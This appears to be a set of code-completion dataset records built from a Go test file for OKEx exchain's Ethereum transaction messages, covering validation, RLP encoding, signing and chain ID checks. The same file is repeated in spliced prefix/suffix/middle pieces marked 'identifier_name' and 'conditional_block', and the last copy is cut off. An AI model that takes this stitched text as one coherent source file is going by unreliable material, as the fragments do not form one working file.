require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
}
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
}
func | (t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
}
| TestMsgEthereumTx_ChainID | identifier_name |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false},
}
for i, tc := range testCases |
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
}
func TestMsgEthereumTx_ChainID(t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
}
| {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
} | conditional_block |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false}, | }
for i, tc := range testCases {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
}
}
// TestMsgEthereumTxRLPSignBytes pins the sign-bytes hash of a fixed
// transaction on chain ID 3 against a golden value, guarding against
// accidental changes to the RLP sign-bytes encoding.
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
// TestMsgEthereumTxRLPEncode pins the RLP encoding of a fixed transaction
// against a golden byte string.
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
// TestMsgEthereumTxRLPDecode decodes a golden RLP byte string and checks the
// result against the expected transaction; it also exercises the decode
// error path using a stream whose size limit is smaller than the payload.
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
// TestMsgEthereumTxSig verifies that signing a MsgEthereumTx binds the
// signature to both the signer key and the chain ID:
//   - a message signed by priv1 recovers addr1 (and not addr2),
//   - VerifySig is repeatable on the same message,
//   - GetSigners exposes the recovered address as an SDK address,
//   - signing/verifying with a zero chain ID succeeds,
//   - verifying against a different chain ID fails with a zero address.
//
// Fixes: removed a leftover debug fmt.Printf of the signer address and
// renamed the misspelled local "trimed" to "trimmed".
func TestMsgEthereumTxSig(t *testing.T) {
	chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
	priv1, _ := ethsecp256k1.GenerateKey()
	priv2, _ := ethsecp256k1.GenerateKey()
	addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
	addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
	// SDK representation of addr1, used to check GetSigners below.
	trimmed := strings.TrimPrefix(addr1.Hex(), "0x")
	addrSDKAddr1, err := sdk.AccAddressFromHex(trimmed)
	require.NoError(t, err)
	// require valid signature passes validation
	msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
	err = msg.Sign(chainID, priv1.ToECDSA())
	require.Nil(t, err)
	signer, err := msg.VerifySig(chainID)
	require.NoError(t, err)
	require.Equal(t, addr1, signer)
	require.NotEqual(t, addr2, signer)
	// verifying a second time must return the same signer (msg atomic load)
	signer, err = msg.VerifySig(chainID)
	require.NoError(t, err)
	require.Equal(t, addr1, signer)
	signers := msg.GetSigners()
	require.Equal(t, 1, len(signers))
	require.True(t, addrSDKAddr1.Equals(signers[0]))
	// zero chainID
	err = msg.Sign(zeroChainID, priv1.ToECDSA())
	require.Nil(t, err)
	_, err = msg.VerifySig(zeroChainID)
	require.Nil(t, err)
	// require invalid chain ID fail validation
	msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
	err = msg.Sign(chainID, priv1.ToECDSA())
	require.Nil(t, err)
	signer, err = msg.VerifySig(big.NewInt(4))
	require.Error(t, err)
	require.Equal(t, ethcmn.Address{}, signer)
}
// TestMsgEthereumTx_ChainID checks chain ID recovery from the signature's V
// value: a signed tx reports the chain ID it was signed with, and for a
// large V the EIP-155 formula chainID = (V - 35) / 2 is applied.
func TestMsgEthereumTx_ChainID(t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
// Overriding V directly exercises ChainID() without re-signing.
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
// TestMsgEthereumTxGetter covers the simple accessors: GetGas, Fee
// (gasPrice * gasLimit), Cost (fee + amount) and RawSignatureValues.
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
